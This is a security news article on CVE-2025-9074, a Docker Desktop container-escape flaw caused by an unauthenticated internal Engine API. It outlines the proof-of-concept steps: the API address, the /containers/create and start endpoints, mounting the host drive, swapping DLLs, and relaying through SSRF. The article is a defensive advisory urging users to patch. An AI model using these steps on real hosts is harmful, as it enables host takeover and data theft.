Docker has rolled out security updates to fix a critical vulnerability (CVE-2025-9074) in Docker Desktop for Windows and macOS. This flaw, rated 9.3 out of 10 on the CVSS scale, could allow attackers to escape container isolation and gain host-level access. The issue has been patched in Docker Desktop version 4.44.3.
According to Docker’s security advisory, a malicious container could exploit the bug to interact with the Docker Engine and create additional containers without the need to mount the Docker socket. This loophole may enable unauthorized access to sensitive files on the host machine. Docker also confirmed that Enhanced Container Isolation (ECI) does not mitigate this vulnerability.
Technical Details
Security researcher Felix Boulet revealed that the weakness arises because containers can connect to the Docker Engine API (192.168.65[.]7:2375) without authentication. This means a container with elevated privileges could mount the C:\ drive and gain complete control over the underlying host.
In a proof-of-concept (PoC) exploit, Boulet demonstrated that:
- A web request from any container can trigger the flaw.
- Attackers can send a POST request with a JSON payload to
/containers/create, binding the host’s C:\ drive to a container folder (/mnt/host/c:/host_root). - By launching the container with
/containers/{id}/start, the attacker could read or modify any file inside/host_root.
Boulet described the bug as “a simple oversight”, explaining that Docker’s internal HTTP API was exposed without proper authentication or access controls.
Further research by Philippe Dugre (zer0x64) of PVOTAL Technologies confirmed that on Windows, attackers could exploit the flaw to:
- Mount the entire filesystem as administrator.
- Steal sensitive data.
- Replace system DLLs to escalate privileges to host-level administrator.
On macOS, the risk is lower since the Docker Desktop app runs with restrictions. Attempts to mount a directory prompt the user for approval, and by default, Docker does not have full filesystem access. Still, an attacker could modify Docker configurations or backdoor containers without requiring user consent.
Linux users remain unaffected because the Docker Engine relies on a named pipe instead of a TCP socket, which prevents this attack path.
Attack Vectors
The most straightforward method of exploitation is through a malicious container deployed by a threat actor. However, Server-Side Request Forgery (SSRF) can also be used to relay malicious requests to the vulnerable Docker socket. While most SSRF flaws only allow GET requests, some rare cases may enable POST, PATCH, or DELETE requests, increasing the severity.
Security Recommendation
Users of Docker Desktop on Windows and macOS are strongly advised to upgrade to version 4.44.3 or later immediately to eliminate the risk.
